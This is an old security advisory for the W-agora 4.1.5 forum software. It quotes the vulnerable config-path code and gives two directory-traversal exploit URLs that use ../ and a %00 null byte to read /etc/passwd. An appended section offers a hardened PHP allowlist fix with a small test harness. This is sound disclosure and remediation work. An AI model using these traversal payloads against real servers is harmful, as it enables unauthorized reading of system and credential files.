sonyy_at_2vias.com.ar
Date: Sun Jan 12 2003 - 09:03:12 CST

       =======================
       ==Shell Security Team==
       =======================

    ==============================
    ====Advisory For W-agora======
    ==============================

    - Product : w-agora
    - Tested version : version 4.1.5
    - Website : http://www.w-agora.net
    - Discovery By Sonyy
    - Vendor Status: informed
    - Problem : A security vulnerability in W-agora

    The bug :
    ==========

    index.php

        if (empty($bn)) {
            # No forum selected -> default to 'site' configuration
            $site = empty($site) ? "agora" : $site;

            $cfg_file = "${cfg_dir}/site_${site}.${ext}";
            $expnd = "all";
        } else {
            $cfg_file = "${cfg_dir}/${bn}.${ext}";
        }

    Exploit :
    =========

    index.php

    http://www.w-agora.net/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00

    And modules.php

    http://www.w-agora.net/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1

    Any Questions :
    ===============

    Sonyy --> Sonico60hotmail.com
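
A hardened form of the index.php path construction shown under "The bug", as an added example that is not part of the advisory or of W-agora's code. The function name wa_config_path(), the allowlist policy and the sample directory are assumptions, and PHP 7.1 or later is assumed.

```php
<?php
// Added example, not W-agora code. $cfg_dir, $ext, $bn and $site follow the
// advisory's snippet; wa_config_path() and the name policy are assumptions.
function wa_config_path(string $cfg_dir, string $ext, ?string $bn, ?string $site): ?string
{
    // Same branch logic as the snippet: no forum selected -> site configuration.
    if ($bn === null || $bn === '') {
        $name = 'site_' . (($site === null || $site === '') ? 'agora' : $site);
    } else {
        $name = $bn;
    }

    // Allowlist the whole name. No "/", "\" or "." can pass, and neither can the
    // NUL byte that %00 decodes to. \A and \z anchor the full string.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }

    // Defence in depth: the resolved file must exist directly inside $cfg_dir.
    $base = realpath($cfg_dir);
    $path = ($base === false) ? false : realpath($base . DIRECTORY_SEPARATOR . $name . '.' . $ext);
    if ($path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Constructed sample configuration directory so the example runs offline.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'wa_conf_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/site_agora.php', "<?php // constructed sample\n");
file_put_contents($dir . '/demos.php', "<?php // constructed sample\n");

// Constructed inputs; the traversal case mirrors the shape of the advisory's request.
$cases = [
    'forum name'         => ['demos', null],
    'default site'       => [null, null],
    'traversal plus NUL' => ["../../../etc/passwd\0", 'demos'],
    'dots only'          => ['..', null],
    'unknown forum'      => ['nosuchforum', null],
];
foreach ($cases as $label => [$bn, $site]) {
    $path = wa_config_path($dir, 'php', $bn, $site);
    printf("%-20s %s\n", $label, $path === null ? 'rejected' : 'ok: ' . basename($path));
}
array_map('unlink', glob($dir . '/*'));
rmdir($dir);
```

Because the check runs on the combined name, it covers both branches of the snippet, including the $site value that is also placed in the path.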